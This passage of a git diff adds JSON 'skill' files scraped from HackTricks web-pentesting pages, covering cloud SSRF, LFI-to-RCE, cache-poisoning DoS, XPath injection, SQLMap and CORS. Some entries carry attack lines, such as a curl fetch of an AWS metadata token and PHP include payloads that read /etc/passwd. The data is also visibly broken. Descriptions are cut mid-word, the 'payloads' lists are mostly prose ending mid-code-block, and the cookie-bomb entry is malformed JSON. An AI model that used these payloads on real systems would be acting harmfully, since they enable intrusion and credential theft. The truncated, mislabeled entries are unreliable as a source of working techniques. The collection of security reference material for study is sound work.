+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/2fa-bypass.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_28fa2fc62136.json b/skills/pentesting_web_28fa2fc62136.json
new file mode 100644
index 0000000..ba21d80
--- /dev/null
+++ b/skills/pentesting_web_28fa2fc62136.json
@@ -0,0 +1,16 @@
+{
+ "id": "pentesting_web_28fa2fc62136",
+ "category": "pentesting-web",
+ "title": "ssrf vulnerable platforms",
+ "description": "# SSRF Vulnerable Platforms\n\n{{#include ../../banners/hacktricks-training.md}}\n\nCheck **[https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)**\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n",
+ "payloads": [
+ "# SSRF Vulnerable Platforms",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "Check **[https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)**",
+ "{{#include ../../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_2982010eda23.json b/skills/pentesting_web_2982010eda23.json
new file mode 100644
index 0000000..418c56e
--- /dev/null
+++ b/skills/pentesting_web_2982010eda23.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_2982010eda23",
+ "category": "pentesting-web",
+ "title": "xpath injection",
+ "description": "# XPATH injection\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Syntax\n\nAn attack technique known as XPath Injection is utilized to take advantage of applications that form XPath (XML Path Language) queries based on user input to query or navigate XML documents.\n\n### Nodes Described\n\nExpressions are used to select various nodes in an XML document. These expressions and their descriptions are summarized below:\n\n- **nodename**: All nodes with the name \"nodename\" are selected.\n- **/**: ",
+ "payloads": [
+ "# XPATH injection",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Syntax",
+ "An attack technique known as XPath Injection is utilized to take advantage of applications that form XPath (XML Path Language) queries based on user input to query or navigate XML documents.",
+ "### Nodes Described",
+ "Expressions are used to select various nodes in an XML document. These expressions and their descriptions are summarized below:",
+ "- **nodename**: All nodes with the name \"nodename\" are selected.",
+ "- **/**: Selection is made from the root node.",
+ "- **//**: Nodes matching the selection from the current node are selected, regardless of their location in the document.",
+ "- **.**: The current node is selected.",
+ "- **..**: The parent of the current node is selected.",
+ "- **@**: Attributes are selected.",
+ "### XPath Examples",
+ "Examples of path expressions and their results include:",
+ "- **bookstore**: All nodes named \"bookstore\" are selected."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/xpath-injection.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_29a260d59c35.json b/skills/pentesting_web_29a260d59c35.json
new file mode 100644
index 0000000..5f73aa5
--- /dev/null
+++ b/skills/pentesting_web_29a260d59c35.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_29a260d59c35",
+ "category": "pentesting-web",
+ "title": "cache poisoning to dos",
+ "description": "# Cache Poisoning to DoS\n\n{{#include ../../banners/hacktricks-training.md}}\n\n> [!CAUTION]\n> In this page you can find different variations to try to make the **web server respond with errors** to requests that are **valid for the cache servers**\n\n- **HTTP Header Oversize (HHO)**\n\nSend a request with a header size larger than the one supported by the web server but smaller than the one supported by the cache server. The web server will respond with a 400 response which might be cached:\n\n```\nGET /",
+ "payloads": [
+ "# Cache Poisoning to DoS",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "> [!CAUTION]",
+ "> In this page you can find different variations to try to make the **web server respond with errors** to requests that are **valid for the cache servers**",
+ "- **HTTP Header Oversize (HHO)**",
+ "Send a request with a header size larger than the one supported by the web server but smaller than the one supported by the cache server. The web server will respond with a 400 response which might be cached:",
+ "GET / HTTP/1.1",
+ "Host: redacted.com",
+ "X-Oversize-Hedear:Big-Value-000000000000000",
+ "- **HTTP Meta Character (HMC) & Unexpected values**",
+ "Send a header that contain some **harmfull meta characters** such as and . In order the attack to work you must bypass the cache first.",
+ "GET / HTTP/1.1",
+ "Host: redacted.com",
+ "X-Meta-Hedear:Bad Chars\\n \\r",
+ "A badly configured header could be just `\\:` as a header."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_2d45bcaf4db5.json b/skills/pentesting_web_2d45bcaf4db5.json
new file mode 100644
index 0000000..cb2880e
--- /dev/null
+++ b/skills/pentesting_web_2d45bcaf4db5.json
@@ -0,0 +1,19 @@
+{
+ "id": "pentesting_web_2d45bcaf4db5",
+ "category": "pentesting-web",
+ "title": "sniff leak",
+ "description": "# Sniff Leak\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Leak script content by converting it to UTF16\n\n[**This writeup**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#modernism21-solves) leaks a text/plain because there is no `X-Content-Type-Options: nosniff` header by adding some initial characters that will make javascript think that the content is in UTF-16 so th script doesn't breaks.\n\n## Leak script content by treating it as an ICO\n\n[**The next writeup**](https://blog",
+ "payloads": [
+ "# Sniff Leak",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Leak script content by converting it to UTF16",
+ "[**This writeup**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#modernism21-solves) leaks a text/plain because there is no `X-Content-Type-Options: nosniff` header by adding some initial characters that will make javascript think that the content is in UTF-16 so th script doesn't breaks.",
+ "## Leak script content by treating it as an ICO",
+ "[**The next writeup**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#precisionism3-solves) leaks the script content by loading it as if it was an ICO image accessing the `width` parameter.",
+ "{{#include ../../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_2f506253f651.json b/skills/pentesting_web_2f506253f651.json
new file mode 100644
index 0000000..c54c08c
--- /dev/null
+++ b/skills/pentesting_web_2f506253f651.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_2f506253f651",
+ "category": "pentesting-web",
+ "title": "cookie bomb + onerror xs leak",
+ "description": "# Cookie Bomb + Onerror XS Leak\n\n{{#include ../../banners/hacktricks-training.md}}\n\nThis technique combines:\n- Cookie bombing: stuffing the victim\u2019s browser with many/large cookies for the target origin so that subsequent requests hit server/request limits (request header size, URL size in redirects, etc.).\n- Error-event oracle: probing a cross-origin endpoint with a `",
+ "",
+ ""
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/xs-search/javascript-execution-xs-leak.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_6ed71b4494bd.json b/skills/pentesting_web_6ed71b4494bd.json
new file mode 100644
index 0000000..60caa56
--- /dev/null
+++ b/skills/pentesting_web_6ed71b4494bd.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_6ed71b4494bd",
+ "category": "pentesting-web",
+ "title": "pl pgsql password bruteforce",
+ "description": "# PL/pgSQL Password Bruteforce\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n**Find [more information about these attack in the original paper](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt)**.\n\nPL/pgSQL is a **fully featured programming language** that extends beyond the capabilities of SQL by offering **enhanced procedural control**. This includes the utilization of loops and various control structures. Functions crafted in the PL/pgSQL language can be invoked by SQ",
+ "payloads": [
+ "# PL/pgSQL Password Bruteforce",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "**Find [more information about these attack in the original paper](http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt)**.",
+ "PL/pgSQL is a **fully featured programming language** that extends beyond the capabilities of SQL by offering **enhanced procedural control**. This includes the utilization of loops and various control structures. Functions crafted in the PL/pgSQL language can be invoked by SQL statements and triggers, broadening the scope of operations within the database environment.",
+ "You can abuse this language in order to ask PostgreSQL to brute-force the users credentials, but it must exist on the database. You can verify it's existence using:",
+ "```sql",
+ "SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';",
+ "lanname | lanacl",
+ "---------+---------",
+ "plpgsql |",
+ "By default, **creating functions is a privilege granted to PUBLIC**, where PUBLIC refers to every user on that database system. To prevent this, the administrator could have had to revoke the USAGE privilege from the PUBLIC domain:",
+ "```sql",
+ "REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;",
+ "In that case, our previous query would output different results:",
+ "```sql"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_6fba750851f3.json b/skills/pentesting_web_6fba750851f3.json
new file mode 100644
index 0000000..eafb074
--- /dev/null
+++ b/skills/pentesting_web_6fba750851f3.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_6fba750851f3",
+ "category": "pentesting-web",
+ "title": "timing attacks",
+ "description": "# Timing Attacks\n\n{{#include ../banners/hacktricks-training.md}}\n\n> [!WARNING]\n> For obtaining a deep understanding of this technique check the original report from [https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work](https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work)\n\n## Basic Information\n\nThe basic goal of a timing attack is basically to be able to answer complicated questions or detect hidden functionalitie",
+ "payloads": [
+ "# Timing Attacks",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "> [!WARNING]",
+ "> For obtaining a deep understanding of this technique check the original report from [https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work](https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-that-actually-work)",
+ "## Basic Information",
+ "The basic goal of a timing attack is basically to be able to answer complicated questions or detect hidden functionalities by just **checking the time differences in the responses from similar requests**.",
+ "Traditionally this has been very complicated because the latency an jitter introduced by both the network and the server. However, since the discovery and improvement of the [**Race Condition Single Packet attack**](race-condition.md#http-2-single-packet-attack-vs.-http-1.1-last-byte-synchronization), it's possible to use this technique to remove all network delays noised from the equation.\\",
+ "Leaving only the **server delays** make timing attack easier to discover and abuse.",
+ "## Discoveries",
+ "### Hidden Attack Surface",
+ "In the blog post is commented how using this technique it was possible to find hidden parameters and even headers just checking that whenever the param or header was present in the request there was a **time difference of about 5ms**. Actually, this discovery technique has been adde to **Param Miner** in Burp Suite.",
+ "These time differences might because a **DNS request** was performed, some **log was written** because an invalid input or because some **checks are performed** when a parameter is present int he request.",
+ "Something you need to remember when performing this kind of attacks is that because of the hidden nature of the surface, you might not know what is the actual real cause of the time differences.",
+ "### Reverse Proxy Misconfigurations",
+ "In the same research, it was shared that the timing technique was great to discover \"scoped SSRFs\" (which are SSRFs that can only access to allowed IP/domains). Just **checking the time difference when an allowed domain is set** versus when a not allowed domain is set helps to discover open proxies even if the response is the same."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/timing-attacks.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_71b9c01bfc37.json b/skills/pentesting_web_71b9c01bfc37.json
new file mode 100644
index 0000000..84b3853
--- /dev/null
+++ b/skills/pentesting_web_71b9c01bfc37.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_71b9c01bfc37",
+ "category": "pentesting-web",
+ "title": "parameter pollution",
+ "description": "# Parameter Pollution | JSON Injection\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## HTTP Parameter Pollution (HPP) Overview\n\nHTTP Parameter Pollution (HPP) is a technique where attackers manipulate HTTP parameters to change the behavior of a web application in unintended ways. This manipulation is done by adding, modifying, or duplicating HTTP parameters. The effect of these manipulations is not directly visible to the user but can significantly alter the application's functionality on t",
+ "payloads": [
+ "# Parameter Pollution | JSON Injection",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## HTTP Parameter Pollution (HPP) Overview",
+ "HTTP Parameter Pollution (HPP) is a technique where attackers manipulate HTTP parameters to change the behavior of a web application in unintended ways. This manipulation is done by adding, modifying, or duplicating HTTP parameters. The effect of these manipulations is not directly visible to the user but can significantly alter the application's functionality on the server side, with observable impacts on the client side.",
+ "### Example of HTTP Parameter Pollution (HPP)",
+ "A banking application transaction URL:",
+ "- **Original URL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000`",
+ "By inserting an additional `from` parameter:",
+ "- **Manipulated URL:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000&from=accountC`",
+ "The transaction may be incorrectly charged to `accountC` instead of `accountA`, showcasing the potential of HPP to manipulate transactions or other functionalities such as password resets, 2FA settings, or API key requests.",
+ "#### **Technology-Specific Parameter Parsing**",
+ "- The way parameters are parsed and prioritized depends on the underlying web technology, affecting how HPP can be exploited.",
+ "- Tools like [Wappalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/) help identify these technologies and their parsing behaviors.",
+ "### PHP and HPP Exploitation",
+ "**OTP Manipulation Case:**"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/parameter-pollution.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_724b23d9b3ff.json b/skills/pentesting_web_724b23d9b3ff.json
new file mode 100644
index 0000000..afdfd38
--- /dev/null
+++ b/skills/pentesting_web_724b23d9b3ff.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_724b23d9b3ff",
+ "category": "pentesting-web",
+ "title": "lfi2rce via eternal waiting",
+ "description": "# LFI2RCE via Eternal waiting\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nBy default when a file is uploaded to PHP (even if it isn't expecting it), it will generate a temporary file in `/tmp` with a name such as **`php[a-zA-Z0-9]{6}`**, although I have seen some docker images where the generated files don't contain digits.\n\nIn a local file inclusion, **if you manage to include that uploaded file, you will get RCE**.\n\nNote that by default **PHP only allows to upload",
+ "payloads": [
+ "# LFI2RCE via Eternal waiting",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "By default when a file is uploaded to PHP (even if it isn't expecting it), it will generate a temporary file in `/tmp` with a name such as **`php[a-zA-Z0-9]{6}`**, although I have seen some docker images where the generated files don't contain digits.",
+ "In a local file inclusion, **if you manage to include that uploaded file, you will get RCE**.",
+ "Note that by default **PHP only allows to upload 20 files in a single request** (set in `/etc/php//apache2/php.ini`):",
+ "; Maximum number of files that can be uploaded via a single request",
+ "max_file_uploads = 20",
+ "Also, the **number of potential filenames are 62\\*62\\*62\\*62\\*62\\*62 = 56800235584**",
+ "### Other techniques",
+ "Other techniques relies in attacking PHP protocols (you won't be able if you only control the last part of the path), disclosing the path of the file, abusing expected files, or **making PHP suffer a segmentation fault so uploaded temporary files aren't deleted**.\\",
+ "This technique is **very similar to the last one but without needed to find a zero day**.",
+ "### Eternal wait technique",
+ "In this technique **we only need to control a relative path**. If we manage to upload files and make the **LFI never end**, we will have \"enough time\" to **brute-force uploaded files** and **find** any of the ones uploaded.",
+ "**Pros of this technique**:"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_73276ded90e7.json b/skills/pentesting_web_73276ded90e7.json
new file mode 100644
index 0000000..463665f
--- /dev/null
+++ b/skills/pentesting_web_73276ded90e7.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_73276ded90e7",
+ "category": "pentesting-web",
+ "title": "lfi2rce via segmentation fault",
+ "description": "# LFI2RCE via Segmentation Fault\n\n{{#include ../../banners/hacktricks-training.md}}\n\nAccording to the writeups [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (second part) and [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view), the following payloads caused a segmentation fault in PHP:\n\n```php\n// PHP 7.0\ninclude(",
+ "payloads": [
+ "# LFI2RCE via Segmentation Fault",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "According to the writeups [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (second part) and [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view), the following payloads caused a segmentation fault in PHP:",
+ "```php",
+ "// PHP 7.0",
+ "include(\"php://filter/string.strip_tags/resource=/etc/passwd\");",
+ "// PHP 7.2",
+ "include(\"php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA\");",
+ "You should know that if you **send** a **POST** request **containing** a **file**, PHP will create a **temporary file in `/tmp/php`** with the contents of that file. This file will be **automatically deleted** once the request was processed.",
+ "If you find a **LFI** and you manage to **trigger** a segmentation fault in PHP, the **temporary file will never be deleted**. Therefore, you can **search** for it with the **LFI** vulnerability until you find it and execute arbitrary code.",
+ "You can use the docker image [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0) for testing.",
+ "```python",
+ "# upload file with segmentation fault",
+ "import requests",
+ "url = \"http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd\""
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_742bcce62ca8.json b/skills/pentesting_web_742bcce62ca8.json
new file mode 100644
index 0000000..ca17683
--- /dev/null
+++ b/skills/pentesting_web_742bcce62ca8.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_742bcce62ca8",
+ "category": "pentesting-web",
+ "title": "cloud ssrf",
+ "description": "# Cloud SSRF\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## AWS\n\n### Abusing SSRF in AWS EC2 environment\n\n**The metadata** endpoint can be accessed from inside any EC2 machine and offers interesting information about it. It's accesible in the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)).\n\nThere are **2 versions** of the metadata endpoint. The **first** one allows to **access** the end",
+ "payloads": [
+ "# Cloud SSRF",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## AWS",
+ "### Abusing SSRF in AWS EC2 environment",
+ "**The metadata** endpoint can be accessed from inside any EC2 machine and offers interesting information about it. It's accesible in the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)).",
+ "There are **2 versions** of the metadata endpoint. The **first** one allows to **access** the endpoint via **GET** requests (so any **SSRF can exploit it**). For the **version 2**, [IMDSv2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html), you need to ask for a **token** sending a **PUT** request with a **HTTP header** and then use that token to access the metadata with another HTTP header (so it's **more complicated to abuse** with a SSRF).",
+ "> [!CAUTION]",
+ "> Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance.",
+ "> Moreover, **IMDSv2** will also **block requests to fetch a token that include the `X-Forwarded-For` header**. This is to prevent misconfigured reverse proxies from being able to access it.",
+ "You can find information about the [metadata endpoints in the docs](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.html). In the following script some interesting information is obtained from it:",
+ "```bash",
+ "EC2_TOKEN=$(curl -X PUT \"http://169.254.169.254/latest/api/token\" -H \"X-aws-ec2-metadata-token-ttl-seconds: 21600\" 2>/dev/null || wget -q -O - --method PUT \"http://169.254.169.254/latest/api/token\" --header \"X-aws-ec2-metadata-token-ttl-seconds: 21600\" 2>/dev/null)",
+ "HEADER=\"X-aws-ec2-metadata-token: $EC2_TOKEN\"",
+ "URL=\"http://169.254.169.254/latest/meta-data\"",
+ "aws_req=\"\""
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_752a7d334e81.json b/skills/pentesting_web_752a7d334e81.json
new file mode 100644
index 0000000..98629f9
--- /dev/null
+++ b/skills/pentesting_web_752a7d334e81.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_752a7d334e81",
+ "category": "pentesting-web",
+ "title": "sqlmap",
+ "description": "# SQLMap\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic arguments for SQLmap\n\n### Generic\n\n```bash\n-u \"\"\n-p \"\"\n--user-agent=SQLMAP\n--random-agent\n--threads=10\n--risk=3 #MAX\n--level=5 #MAX\n--dbms=\"\"\n--os=\"\"\n--technique=\"UB\" #Use only techniques UNION and BLIND in that order (default \"BEUSTQ\")\n--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers\n--auth-type=\"\" #HTTP authentication type (Bas",
+ "payloads": [
+ "# SQLMap",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic arguments for SQLmap",
+ "### Generic",
+ "```bash",
+ "-u \"\"",
+ "-p \"\"",
+ "--user-agent=SQLMAP",
+ "--random-agent",
+ "--threads=10",
+ "--risk=3 #MAX",
+ "--level=5 #MAX",
+ "--dbms=\"\"",
+ "--os=\"\"",
+ "--technique=\"UB\" #Use only techniques UNION and BLIND in that order (default \"BEUSTQ\")"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/sql-injection/sqlmap.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_756b41f77910.json b/skills/pentesting_web_756b41f77910.json
new file mode 100644
index 0000000..2047d1d
--- /dev/null
+++ b/skills/pentesting_web_756b41f77910.json
@@ -0,0 +1,23 @@
+{
+ "id": "pentesting_web_756b41f77910",
+ "category": "pentesting-web",
+ "title": "ruby json pollution",
+ "description": "# Ruby _json pollution\n\n{{#include ../../banners/hacktricks-training.md}}\n\nThis is a summary from the post [https://nastystereo.com/security/rails-_json-juggling-attack.html](https://nastystereo.com/security/rails-_json-juggling-attack.html)\n\n\n## Basic information\n\nWhen sending in a body some values not hashabled like an array they will be added into a new key called `_json`. However, It\u2019s possible for an attacker to also set in the body a value called `_json` with the arbitrary values he wishes",
+ "payloads": [
+ "# Ruby _json pollution",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "This is a summary from the post [https://nastystereo.com/security/rails-_json-juggling-attack.html](https://nastystereo.com/security/rails-_json-juggling-attack.html)",
+ "## Basic information",
+ "When sending in a body some values not hashabled like an array they will be added into a new key called `_json`. However, It\u2019s possible for an attacker to also set in the body a value called `_json` with the arbitrary values he wishes. Then, If the backend for example checks the veracity of a parameter but then also uses the `_json` parameter to perform some action, an authorisation bypass could be performed.",
+ "```json",
+ "\"id\": 123,",
+ "\"_json\": [456, 789]",
+ "## References",
+ "- [https://nastystereo.com/security/rails-_json-juggling-attack.html](https://nastystereo.com/security/rails-_json-juggling-attack.html)",
+ "{{#include ../../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/deserialization/ruby-_json-pollution.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_75a4ca9c3196.json b/skills/pentesting_web_75a4ca9c3196.json
new file mode 100644
index 0000000..693cd2b
--- /dev/null
+++ b/skills/pentesting_web_75a4ca9c3196.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_75a4ca9c3196",
+ "category": "pentesting-web",
+ "title": "web vulnerabilities methodology",
+ "description": "# Web Vulnerabilities Methodology\n\n{{#include ../banners/hacktricks-training.md}}\n\n\nIn every Web Pentest, there are **several hidden and obvious places that might be vulnerable**. This post is meant to be a checklist to confirm that you have searched for vulnerabilities in all the possible places.\n\n## Proxies\n\n> [!TIP]\n> Nowadays **web** **applications** usually **uses** some kind of **intermediary** **proxies**, those may be (ab)used to exploit vulnerabilities. These vulnerabilities need a vuln",
+ "payloads": [
+ "# Web Vulnerabilities Methodology",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "In every Web Pentest, there are **several hidden and obvious places that might be vulnerable**. This post is meant to be a checklist to confirm that you have searched for vulnerabilities in all the possible places.",
+ "## Proxies",
+ "> [!TIP]",
+ "> Nowadays **web** **applications** usually **uses** some kind of **intermediary** **proxies**, those may be (ab)used to exploit vulnerabilities. These vulnerabilities need a vulnerable proxy to be in place, but they usually also need some extra vulnerability in the backend.",
+ "- [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md)",
+ "- [ ] [**Cache Poisoning/Cache Deception**](cache-deception/index.html)",
+ "- [ ] [**HTTP Connection Contamination**](http-connection-contamination.md)",
+ "- [ ] [**HTTP Connection Request Smuggling**](http-connection-request-smuggling.md)",
+ "- [ ] [**HTTP Request Smuggling**](http-request-smuggling/)",
+ "- [ ] [**HTTP Response Smuggling / Desync**](http-response-smuggling-desync.md)",
+ "- [ ] [**H2C Smuggling**](h2c-smuggling.md)",
+ "- [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)",
+ "- [ ] [**Uncovering Cloudflare**](../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/web-vulnerabilities-methodology.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_76815e6db182.json b/skills/pentesting_web_76815e6db182.json
new file mode 100644
index 0000000..4844cbe
--- /dev/null
+++ b/skills/pentesting_web_76815e6db182.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_76815e6db182",
+ "category": "pentesting-web",
+ "title": "livewire hydration synthesizer abuse",
+ "description": "# Laravel Livewire Hydration & Synthesizer Abuse\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Recap of the Livewire state machine\n\nLivewire 3 components exchange their state through **snapshots** that contain `data`, `memo`, and a checksum. Every POST to `/livewire/update` rehydrates the JSON snapshot server-side and executes the queued `calls`/`updates`.\n\n```php\nclass Checksum {\n static function verify($snapshot) {\n $checksum = $snapshot['checksum'];\n unset($snapshot[",
+ "payloads": [
+ "# Laravel Livewire Hydration & Synthesizer Abuse",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Recap of the Livewire state machine",
+ "Livewire 3 components exchange their state through **snapshots** that contain `data`, `memo`, and a checksum. Every POST to `/livewire/update` rehydrates the JSON snapshot server-side and executes the queued `calls`/`updates`.",
+ "```php",
+ "class Checksum {",
+ "static function verify($snapshot) {",
+ "$checksum = $snapshot['checksum'];",
+ "unset($snapshot['checksum']);",
+ "if ($checksum !== self::generate($snapshot)) {",
+ "throw new CorruptComponentPayloadException;",
+ "static function generate($snapshot) {",
+ "return hash_hmac('sha256', json_encode($snapshot), $hashKey);",
+ "Anyone holding `APP_KEY` (used to derive `$hashKey`) can therefore forge arbitrary snapshots by recomputing the HMAC.",
+ "Complex properties are encoded as **synthetic tuples** detected by `Livewire\\Drawer\\BaseUtils::isSyntheticTuple()`; each tuple is `[value, {\"s\":\"\", ...meta}]`. The hydration core simply delegates every tuple to the synth selected in `HandleComponents::$propertySynthesizers` and recurses over children:"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/pentesting-web/deserialization/livewire-hydration-synthesizer-abuse.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/pentesting_web_77dab65b9438.json b/skills/pentesting_web_77dab65b9438.json
new file mode 100644
index 0000000..1fa5dc7
--- /dev/null
+++ b/skills/pentesting_web_77dab65b9438.json
@@ -0,0 +1,27 @@
+{
+ "id": "pentesting_web_77dab65b9438",
+ "category": "pentesting-web",
+ "title": "cors bypass",
+ "description": "# CORS - Misconfigurations & Bypass\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## What is CORS?\n\nCross-Origin Resource Sharing (CORS) standard **enables servers to define who can access their assets** and **which HTTP request methods are permitted** from external sources.\n\nA **same-origin** policy mandates that a **server requesting** a resource and the server hosting the **resource** share the same protocol (e.g., `http://`), domain name (e.g., `internal-web.com`), and **port** (e.g., 80",
+ "payloads": [
+ "# CORS - Misconfigurations & Bypass",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## What is CORS?",
+ "Cross-Origin Resource Sharing (CORS) standard **enables servers to define who can access their assets** and **which HTTP request methods are permitted** from external sources.",
